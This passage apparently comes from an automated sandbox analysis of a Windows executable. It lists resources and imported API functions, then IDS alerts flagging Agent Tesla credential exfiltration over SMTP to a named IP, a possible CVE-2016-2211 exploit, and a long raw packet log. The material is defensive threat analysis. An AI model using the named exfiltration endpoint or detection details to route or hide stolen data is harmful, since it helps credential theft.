                                                                            RT_ICON0x4181e00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.6668032786885246
                                                                            RT_ICON0x418b680x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.7287234042553191
                                                                            RT_DIALOG0x418fd00x100dataEnglishUnited States0.5234375
                                                                            RT_DIALOG0x4190d00x11cdataEnglishUnited States0.6056338028169014
                                                                            RT_DIALOG0x4191f00xc4dataEnglishUnited States0.5918367346938775
                                                                            RT_DIALOG0x4192b80x60dataEnglishUnited States0.7291666666666666
                                                                            RT_GROUP_ICON0x4193180x84Targa image data - Map 32 x 25730 x 1 +1EnglishUnited States0.7348484848484849
                                                                            RT_VERSION0x4193a00x220dataEnglishUnited States0.5110294117647058
                                                                            RT_MANIFEST0x4195c00x349XML 1.0 document, ASCII text, with very long lines (841), with no line terminatorsEnglishUnited States0.5529131985731273
                                                                            DLLImport
                                                                            ADVAPI32.dllRegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegEnumKeyW, RegEnumValueW, RegQueryValueExW, RegSetValueExW, OpenProcessToken, AdjustTokenPrivileges, LookupPrivilegeValueW, SetFileSecurityW, RegCreateKeyExW, RegOpenKeyExW
                                                                            SHELL32.dllShellExecuteExW, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, SHGetSpecialFolderLocation
                                                                            ole32.dllOleInitialize, OleUninitialize, CoTaskMemFree, IIDFromString, CoCreateInstance
                                                                            COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                                                            USER32.dllDispatchMessageW, wsprintfA, SystemParametersInfoW, SetClassLongW, GetWindowLongW, GetSysColor, ScreenToClient, SetCursor, GetWindowRect, TrackPopupMenu, AppendMenuW, EnableMenuItem, CreatePopupMenu, GetSystemMenu, GetSystemMetrics, IsWindowEnabled, EmptyClipboard, SetClipboardData, CloseClipboard, OpenClipboard, CheckDlgButton, EndDialog, DialogBoxParamW, IsWindowVisible, SetWindowPos, CreateWindowExW, GetClassInfoW, PeekMessageW, CallWindowProcW, GetMessagePos, CharNextW, ExitWindowsEx, SetWindowTextW, SetTimer, CreateDialogParamW, DestroyWindow, LoadImageW, FindWindowExW, SetWindowLongW, InvalidateRect, ReleaseDC, GetDC, SetForegroundWindow, EnableWindow, GetDlgItem, ShowWindow, IsWindow, PostQuitMessage, SendMessageTimeoutW, SendMessageW, wsprintfW, FillRect, GetClientRect, EndPaint, BeginPaint, DrawTextW, DefWindowProcW, SetDlgItemTextW, GetDlgItemTextW, CharNextA, MessageBoxIndirectW, RegisterClassW, CharPrevW, LoadCursorW
                                                                            GDI32.dllSetBkMode, CreateBrushIndirect, GetDeviceCaps, SelectObject, DeleteObject, SetBkColor, SetTextColor, CreateFontIndirectW
                                                                            KERNEL32.dllWriteFile, GetLastError, WaitForSingleObject, GetExitCodeProcess, GetTempFileNameW, CreateFileW, CreateDirectoryW, WideCharToMultiByte, lstrlenW, lstrcpynW, GlobalLock, GlobalUnlock, CreateThread, GetDiskFreeSpaceW, CopyFileW, GetVersionExW, GetWindowsDirectoryW, ExitProcess, GetCurrentProcess, CreateProcessW, GetTempPathW, SetEnvironmentVariableW, GetCommandLineW, GetModuleFileNameW, GetTickCount, GetFileSize, MultiByteToWideChar, MoveFileW, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, lstrcmpiW, lstrcmpW, MulDiv, GlobalFree, GlobalAlloc, LoadLibraryExW, GetModuleHandleW, FreeLibrary, Sleep, CloseHandle, SetFileTime, SetFilePointer, SetFileAttributesW, ReadFile, GetShortPathNameW, GetFullPathNameW, GetFileAttributesW, FindNextFileW, FindFirstFileW, FindClose, DeleteFileW, CompareFileTime, SearchPathW, SetCurrentDirectoryW, ExpandEnvironmentStringsW, RemoveDirectoryW, GetSystemDirectoryW, MoveFileExW, GetModuleHandleA, GetProcAddress, lstrcmpiA, lstrcpyA, lstrcatW, SetErrorMode
                                                                            Language of compilation systemCountry where language is spokenMap
                                                                            EnglishUnited States
                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                            2024-11-01T12:14:50.254129+01002030171ET MALWARE AgentTesla Exfil Via SMTP1192.168.2.949740199.79.62.115587TCP
                                                                            2024-11-01T12:14:50.254129+01002839723ETPRO MALWARE Win32/Agent Tesla SMTP Activity1192.168.2.949740199.79.62.115587TCP
                                                                            2024-11-01T12:14:50.254129+01002840032ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M21192.168.2.949740199.79.62.115587TCP
                                                                            2024-11-01T12:15:13.891888+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.949735TCP
                                                                            2024-11-01T12:15:39.027883+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949738172.217.18.14443TCP
                                                                            2024-11-01T12:15:46.463898+01002855245ETPRO MALWARE Agent Tesla Exfil via SMTP1192.168.2.949740199.79.62.115587TCP
                                                                            2024-11-01T12:15:46.463898+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.949740199.79.62.115587TCP
                                                                            2024-11-01T12:15:52.715680+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.949741TCP
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Nov 1, 2024 12:15:37.731329918 CET49738443192.168.2.9172.217.18.14
                                                                            Nov 1, 2024 12:15:37.731384993 CET44349738172.217.18.14192.168.2.9
                                                                            Nov 1, 2024 12:15:37.731466055 CET49738443192.168.2.9172.217.18.14
                                                                            Nov 1, 2024 12:15:37.742582083 CET49738443192.168.2.9172.217.18.14
                                                                            Nov 1, 2024 12:15:37.742623091 CET44349738172.217.18.14192.168.2.9
                                                                            Nov 1, 2024 12:15:38.604748964 CET44349738172.217.18.14192.168.2.9
                                                                            Nov 1, 2024 12:15:38.604890108 CET49738443192.168.2.9172.217.18.14
                                                                            Nov 1, 2024 12:15:38.605706930 CET44349738172.217.18.14192.168.2.9
                                                                            Nov 1, 2024 12:15:38.605784893 CET49738443192.168.2.9172.217.18.14
                                                                            Nov 1, 2024 12:15:38.658992052 CET49738443192.168.2.9172.217.18.14
                                                                            Nov 1, 2024 12:15:38.659020901 CET44349738172.217.18.14192.168.2.9
                                                                            Nov 1, 2024 12:15:38.659348011 CET44349738172.217.18.14192.168.2.9
                                                                            Nov 1, 2024 12:15:38.659394979 CET49738443192.168.2.9172.217.18.14
                                                                            Nov 1, 2024 12:15:38.662451982 CET49738443192.168.2.9172.217.18.14
                                                                            Nov 1, 2024 12:15:38.707334042 CET44349738172.217.18.14192.168.2.9
                                                                            Nov 1, 2024 12:15:39.027863979 CET44349738172.217.18.14192.168.2.9
                                                                            Nov 1, 2024 12:15:39.028007030 CET49738443192.168.2.9172.217.18.14
                                                                            Nov 1, 2024 12:15:39.028042078 CET44349738172.217.18.14192.168.2.9
                                                                            Nov 1, 2024 12:15:39.028101921 CET49738443192.168.2.9172.217.18.14
                                                                            Nov 1, 2024 12:15:39.028166056 CET49738443192.168.2.9172.217.18.14
                                                                            Nov 1, 2024 12:15:39.028206110 CET44349738172.217.18.14192.168.2.9
                                                                            Nov 1, 2024 12:15:39.028296947 CET49738443192.168.2.9172.217.18.14
                                                                            Nov 1, 2024 12:15:39.053014040 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:39.053047895 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:39.053118944 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:39.053391933 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:39.053401947 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:39.953433990 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:39.953509092 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:39.970211029 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:39.970262051 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:39.970966101 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:39.971055031 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:39.975683928 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:40.023360014 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.388942957 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.389147043 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.397880077 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.398010015 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.505563974 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.505665064 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.505672932 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.505702019 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.505717993 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.505738974 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.518935919 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.519042969 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.519052029 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.519093037 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.523683071 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.523751974 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.523757935 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.523792982 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.533142090 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.533229113 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.533235073 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.533293962 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.542695045 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.542762041 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.542768002 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.542808056 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.552226067 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.552289009 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.552293062 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.552305937 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.552329063 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.552361012 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.561755896 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.561811924 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.561817884 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.561997890 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.571472883 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.571568012 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.571597099 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.571655035 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.581033945 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.581101894 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.581127882 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.581195116 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.622879028 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.623003006 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.623028040 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.623090029 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.623095989 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.623135090 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.623146057 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.623189926 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.623231888 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.623272896 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.623343945 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.623382092 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.623652935 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.623698950 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.623735905 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.623785019 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.636219978 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.636305094 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.636313915 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.636367083 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.649843931 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.649909973 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.649960041 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.650006056 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.653074980 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.653121948 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.653127909 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.653172970 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.676642895 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.676728010 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.676733017 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.676742077 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.676770926 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.676779985 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.676800966 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.676805973 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.676820993 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.676846027 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.676954985 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.676994085 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.677006006 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.677052975 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.678359032 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.678411961 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.678416014 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.678457022 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.684484005 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.684544086 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.684547901 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.684597015 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.690567017 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.690634966 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.690639973 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.690684080 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.697021961 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.697227955 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.697233915 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.697289944 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.703300953 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.703363895 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.703391075 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.703437090 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.709171057 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.709258080 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.709264994 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.709376097 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.715871096 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.715961933 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.715967894 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.716033936 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.721497059 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.721606970 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.721631050 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.721703053 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.727798939 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.727883101 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.727905035 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.727953911 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.733967066 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.734055996 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.734072924 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.734143019 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.739945889 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.740041971 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.740067959 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.740247011 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.746268034 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.746368885 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.746387959 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.746454954 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.752331018 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.752429008 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.752453089 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.752540112 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.758270979 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.758373022 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.758394957 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.758461952 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.764234066 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.764332056 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.764343977 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.764400005 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.770123959 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.770226955 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.770250082 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.770334959 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.775584936 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.775671959 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.775693893 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.775742054 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.781140089 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.781236887 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.781248093 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.781327009 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.786701918 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.786818981 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.786839008 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.786925077 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.790564060 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.790666103 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.790677071 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.790828943 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.794128895 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.794210911 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.794215918 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.794259071 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.797557116 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.797661066 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.797679901 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.797727108 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.801078081 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.801139116 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.801148891 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.801186085 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.804506063 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.804558992 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.804569960 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.804615974 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.807979107 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.808022976 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.808032990 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.808064938 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.811893940 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.811950922 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.811954975 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.811994076 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.814860106 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.814910889 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.814917088 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.814949989 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.818348885 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.818427086 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.818437099 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.818492889 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.821562052 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.821615934 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.821630001 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.821671963 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.825148106 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.825213909 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.825243950 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.825289965 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.828289032 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.828337908 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.828711033 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.828754902 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.831456900 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.831517935 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.831522942 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.831559896 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.834331989 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.834387064 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.834391117 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.834433079 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.837939024 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.837989092 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.837994099 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.838033915 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.840610981 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.840662956 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.840673923 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.840744019 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.843727112 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.843790054 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.843796968 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.843847036 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.846811056 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.846869946 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.847163916 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.847213030 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.849706888 CET44349739142.250.185.193192.168.2.9
                                                                            Nov 1, 2024 12:15:42.849757910 CET49739443192.168.2.9142.250.185.193
                                                                            Nov 1, 2024 12:15:42.849762917 CET44349739142.250.185.193192.168.2.9
